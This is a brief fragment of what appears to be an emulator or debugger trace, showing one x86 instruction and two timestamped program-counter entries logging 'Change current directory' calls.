0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:17.75066032Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.754657755Z 59 PC: 12da6 | Change current directory